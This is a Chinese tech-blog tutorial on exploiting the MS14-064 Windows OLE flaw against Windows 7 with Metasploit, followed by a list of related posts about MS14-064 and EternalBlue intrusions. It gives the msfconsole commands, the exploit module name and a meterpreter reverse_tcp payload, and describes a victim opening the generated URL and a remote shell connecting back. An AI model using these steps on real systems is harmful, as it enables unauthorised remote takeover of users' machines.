MS14-064 漏洞测试入侵win7

最新推荐文章于 2025-03-04 17:57:29 发布
最新推荐文章于 2025-03-04 17:57:29 发布
阅读量1.3w 收藏 45
点赞数 10
分类专栏: Kali 技术分享
本文介绍了一个影响广泛Windows版本的OLE远程代码执行漏洞,通过构造网站来执行任意代码。利用Metasploit框架中的模块进行攻击演示,并详细展示了配置过程及效果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,

远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...

metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution

执行命令:

msfconsole    //启动MSF

search ms14   //搜索关键字

use exploit/windows/browser/ms14_064_ole_code_execution  // 加载漏洞利用模块

set payload windows/meterpreter/reverse_tcp    //设置反弹连接shell

如图:

需要注意的是箭头标记的属性默认为false 需要设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell,

所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,

所以我们这里测试受害的机器为windows7 32位.

按照图中各个属性配置好后 执行exploit即可

得到一个URL地址,复制到受害者机器(win7)测试

当用户点击允许了后

可以看见这边反弹了一个shell,接下里我们就可以随便玩了, 

 测试成功,结束。

技术宅的路上少不了苦逼和孤独,但那又怎样,哪怕成不了大神,也要码的漂亮。

kali linux 2.0入侵windiws7系统 ------ms14-064漏洞
边城浪子的博客
08-07 3264
漏洞介绍: Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execu...
渗透攻击之ms14-064漏洞利用实验
wylululu的博客
01-07 8562
ms14-064简介 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。 实验步骤: 第一步:打开已安装好的kaili虚拟机系统,显示界面: 第二步:单击打开metasploit framework或者点击左上角应用程序&...
用于渗透测试的10种漏洞扫描的工具(非常详细)零基础入门到精通,收藏这一篇就够了
A1_3_9_7的博客
03-04 1525
漏洞扫描工具是IT部门中必不可少的工具之一,因为漏洞每天都会出现,给企业带来安全隐患。掌握熟悉便捷的漏洞扫描工具有助于检测安全漏洞、应用程序、操作系统、硬件和网络系统。- Nmap是一种流行的开源工具,用于网络发现和安全审计。它可以帮助渗透测试人员扫描网络上的主机和服务,并识别潜在的漏洞- Nessus是一种全面的漏洞扫描工具,能够快速识别网络上的各种漏洞和安全问题。它提供了一个用户友好的界面,使渗透测试人员能够轻松地进行扫描和分析。
MS14-064(OLE远程代码执行漏洞复现)
Martin-share的博客
02-11 2429
MS14-064(OLE远程代码执行漏洞复现)
MS14_064 漏洞利用与安全加固
theRavensea
03-18 1948
要利用此漏洞则需要进行用户交互。通过发送电子邮件信息给本地登录用户的攻击要想得逞,需要该用户打开包含经特殊设计的 OLE 对象的附件。许多不同类型的附带文档都可能包含受影响的 OLE 对象,所有 Office 文件类型以及其他一些第三方文件类型都可能包含恶意 OLE 对象。在电子邮件攻击情形中,攻击者可以通过向用户发送经特殊设计的文件并诱使用户打开该文件来利用此漏洞。在基于 Web 的攻击情形中,攻击者必须拥有一个网站,其中包含用来试图利用此漏洞的 Office 文件。另外,受到破坏的网站以及接受或宿主用户
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1961
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
kali利用ms17-010永恒之蓝漏洞入侵windows7
最新发布
03-29
1.先在kali中启动metasploit工具...帮助对网络安全感兴趣的同学学习metasploit的基本用法,以及攻击win7的经典方式。 环境: kali虚拟机,安装了msfconsole、windows7,未打永恒之蓝漏洞补丁。 希望能对大家有所帮助
了解ms17-010漏洞及其在win7系统中的影响
MS17-010漏洞影响范围广泛,涵盖了多个Windows操作系统版本,包括Windows 7Windows 8、Windows 10等。攻击者可以利用该漏洞执行远程代码,获取系统控制权限。 ## 1.3 漏洞利用方式 攻击者可以通过发送经过精心...
Metasploit简单利用及入侵Windows7案例.docx
11-13
### Metasploit简单利用及入侵Windows7案例 #### 一、MS17_010漏洞利用实验 ##### 1. 发起漏洞探测 - **背景介绍**:本实验选择了MS17_010(永恒之蓝)漏洞进行攻击尝试。此漏洞允许攻击者在未打补丁的Windows...
MS14-064漏洞复现
kukudeshuo的博客
02-28 7272
MS14-064漏洞复现 摘要 此安全更新可解决 Microsoft Windows 对象链接与嵌入 (OLE) 中 2 个私下报告的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。成功利用这些漏洞的攻击者可以在当前用户的上下文中运行任意代码。如果当前用户使用管理用户权限登录,则攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。 漏洞影响版本
针对ms14-064模块漏洞的网络渗透实战
skjie的博客
01-11 1049
针对ms14-064模块漏洞的网络渗透实战
MS14-064 漏洞复现
p_utao的博客
03-05 865
背景 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本… 模块:exploit/windows/browser/ms14_064_ole_code_execution 复现 系统 IP linux 10.7.10.43 win7 10.7.10.49 msf6 > search ms14-064
系统渗透ms14-064漏洞攻击
旺仔Sec&blog
12-15 1916
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution 漏洞利用成功 ...
kali之***win7系统2
weixin_33708432的博客
06-29 200
Metasploit是一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报Metasploit软件为它的基础功能提供了多个用户接口,包括终端、命令行和图形化界面等启动Metasploit服务运行Armitage工具打开定义MSF探测主机探测到的主机确定操作系统 转载于:https://blog...
Kali下metasploit渗透Windows7
如诗如画
06-16 3171
Kali下metasploit渗透Windows7/教程详细/ 靶场环境 操作系统 Kali_Linux IP:172.17.201.44 靶机 windows7 IP:172.17.201.12 使用工具 metasploit nmap 正文 1.首先使用namp对靶机进行扫描,确定445端口是否开启 2.打开metasploit搜索ms17-010 1. msfconsole 2. search ms17-010 3.选择漏洞验证扫描工具并设置参数 1. use auxiliary/ad
漏洞复现:MS14-064 OLE远程代码执行漏洞
dingbai2663的博客
09-23 2915
MS14-064OLE远程代码执行漏洞 攻击机:Kali Linux 2019 靶机:Windows 7 x64、x32 攻击步骤: 1.打开攻击机Kali Linux 2019系统和靶机Windows 7系统 2.确定IP地址后,Kali Linux开启msf模块,准备攻击测试 3.在这里我们使用MS14-064OL...
MS14-064/CVE-2014-6332漏洞复现(OLE远程代码执行漏洞、IE浏览器漏洞
m0_74168970的博客
04-24 711
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。show options:查看需要设置的地方。
ms14-064漏洞复现停滞在Sending exploit
06-12
我理解你的问题是想要复现 MS14-064 漏洞,但是在发送 exploit 时遇到了问题,出现了停滞的情况。 首先,MS14-064 是一个由 Microsoft 发布的安全公告,涉及的漏洞编号为 CVE-2014-6324,它存在于 Windows Object Linking and Embedding (OLE) 中,攻击者可以利用该漏洞实现远程执行代码。 如果你想要复现该漏洞,可以先找到一个受影响的 Windows 系统,并下载相应的漏洞利用工具。在发送 exploit 之前,你需要确保目标主机与攻击者主机之间能够正常通信,并且攻击者主机已经安装了相应的依赖库和工具。 如果出现了停滞的情况,可能是由于网络连接出现了问题,或是漏洞利用工具配置不正确等原因。你可以根据漏洞利用工具的日志信息来进行排查,或是参考相关的攻击教程进行调试。 需要注意的是,漏洞利用是一项高度危险的操作,建议在合法授权的情况下进行,并且不要在生产环境中进行测试。
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值